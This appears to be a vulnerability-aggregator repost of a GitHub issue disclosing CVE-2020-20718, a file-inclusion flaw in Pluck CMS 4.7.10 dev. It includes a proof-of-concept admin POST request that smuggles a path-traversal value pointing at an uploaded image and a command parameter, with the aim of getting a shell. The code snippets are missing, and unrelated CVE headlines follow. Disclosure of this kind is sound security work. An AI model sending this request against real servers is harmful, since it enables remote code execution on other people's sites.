Headline

CVE-2020-20718: File contains vuln pluck 4.7.10 dev version · Issue #79 · pluck-cms/pluck

File Upload vulnerability in PluckCMS v.4.7.10 dev versions allows a remote attacker to execute arbitrary code via a crafted image file to the the save_file() parameter.

1 year ago

CVE

Open in Source

#vulnerability #windows #php #firefox

admin.php:

language.php：

save_file():

“…/…/…/images/wphp.jpg” Be written to \data\settings\langpref.php

Users can upload a picture file containing malicious code to getshell.

POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1
Host: 127.0.0.1:83
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language
Cookie: LQUKaS_admin_username=admin; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

cont1=…/…/…/images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago